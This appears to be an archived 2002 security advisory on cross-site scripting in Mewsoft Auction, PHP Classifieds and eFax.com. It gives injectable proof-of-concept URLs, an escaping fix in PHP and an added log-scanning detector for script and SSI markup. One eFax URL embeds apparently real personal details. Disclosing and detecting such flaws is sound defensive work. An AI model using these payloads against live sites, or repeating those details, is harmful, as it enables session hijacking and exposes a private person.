Mewsoft Auction, PHP Classifieds and eFax.com - CrossSiteScripting issues

From: § o m e 1 (exeat_private)
Date: Fri Jun 14 2002 - 11:15:05 PDT


    Advisory name: SSI & CSS execution in Mewsoft Auction, PHP Classifieds and
    eFax.com
    Application: Mewsoft Auction (Perl script), PHP Classifieds (PHP), eFax.com
    (ASP)
    Date: 14.6.2002
    Impact: remote user can execute shell commands & cross site scripting
    
    =====================================
    
    
    CrossSiteScripting @ Mewsoft Auction Script
    <example>
    http://www.xxxx.com/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script>&Where=&Sort=Photo&Dir=
    </example>
    
    Program Name    : Mewsoft Auction
    Program Version : 3.0
    Home Page         : http://www.mewsoft.com
    
    
    =====================================
    
    CrossSiteScripting @ PHP Classifieds
    <example>
    http://www.xxxx.com/phpclassifieds/latestwap.php?url=>alert('OopS');</script>
    </example>
    
    Program Name    : PHP Classifieds
    Program Version : 6.05
    Home Page         : http://www.deltascripts.com/phpclassifieds
    
    
    =====================================
    
    https://www.efax.com/signup/plus/invalid_cc.asp?FirstName=Nadeem&LastName=ali&OpSys=Win2000&Email=ra3e%5Fe7sas%40hotmail%2Ecom&PIN=9999&referralcode=&service=OR%2DPortland%2D503%2DP&VID=5&BID=427%2D2379%2D3151&HomePhone=5302723558&OFFERCODE=EFAX%5FPLUS&orderNumber=43423716&CreditCardType=MC&CreditCardNumber=:)&expmonth=03&expyear=2003&StreetAddress=10621+Cedar+Ave&StreetAddress2=&City=Grass+Valley&MailRegion=CA&PostalCode=95945&Country=United+States&LogoCode=&reorder_amount=&BillingFreq=Anually&startpage=1&agreed=yes&USCities=OR%2DPortland%2D503%2DP&EurCities=NONE&AsiaCities=NONE&LatCities=NONE&CCNumberError=<script>alert('OopS');</script>
    
    The eFax web site has many CSS issues; that was just one example.
    
    
    Solution: DON'T trust the user; filter everything. Example in PHP:
    <?php
    // Untrusted value straight from the request (a search term, an error message, etc.).
    $input = isset($_GET['input']) ? $_GET['input'] : '';
    // Encode <, >, & and both quote styles so the value is rendered as text, not markup.
    $input = htmlspecialchars($input, ENT_QUOTES);
    echo "<hr>your input was:<b>$input</b>";
    ?>
    
    For your information: CSS can sometimes be used to execute shell commands on
    the web server (via SSI, depending on the web server configuration), not only
    to hijack cookies...
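    As an added example (not part of the original post), a small check a site
    operator could run over web server access logs to spot the script markup and
    SSI directives described above arriving in parameters such as Terms, url and
    CCNumberError. The log lines below are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log samples (not real traffic). The first three carry
# the kind of script/SSI markup the advisory describes; the last one is benign.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Jun/2002:11:15:05 -0700] "GET /cgi-bin/auction/auction.cgi?action=Sort_Page&Terms=%3Cscript%3Ealert%28%27OopS%27%29%3B%3C%2Fscript%3E&Sort=Photo HTTP/1.0" 200 5120
192.0.2.11 - - [14/Jun/2002:11:16:30 -0700] "GET /phpclassifieds/latestwap.php?url=%3C%21--%23echo+--%3E HTTP/1.0" 200 812
192.0.2.12 - - [14/Jun/2002:11:17:02 -0700] "GET /signup/plus/invalid_cc.asp?CreditCardType=MC&CCNumberError=%3CScRiPt%3Ealert%281%29%3C%2FScRiPt%3E HTTP/1.0" 200 2210
192.0.2.13 - - [14/Jun/2002:11:18:44 -0700] "GET /cgi-bin/auction/auction.cgi?action=Sort_Page&Terms=blue+bike HTTP/1.0" 200 4890
"""

# Front of a combined-format line: client IP, then the quoted request line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# Markup that should never appear in a search term or error message:
# a script tag (any case, optional attributes) or the opening of an SSI directive.
SUSPICIOUS_RE = re.compile(r'<\s*script\b|<!--\s*#', re.IGNORECASE)

def suspicious_params(line):
    """Return (client_ip, path, [param names]) for a log line whose decoded query
    values contain script or SSI markup, or None when nothing looks injected."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes and turns '+' into spaces, so encoded payloads are seen.
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = [name for name, values in params.items()
            if any(SUSPICIOUS_RE.search(v) for v in values)]
    if not hits:
        return None
    return (m.group("ip"), parts.path, hits)

def scan_log(text):
    """Run suspicious_params over every line; returns the list of findings."""
    return [f for f in (suspicious_params(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for ip, path, names in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} suspicious parameter(s): {', '.join(names)}")
```

    Because matching happens on the decoded value, the same check catches payloads
    sent percent-encoded or in mixed case, which a raw substring search would miss.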
    
    
    § o m e 1
    http://127.0.0.1/
    



    This archive was generated by hypermail 2b30 : Fri Jun 14 2002 - 13:14:11 PDT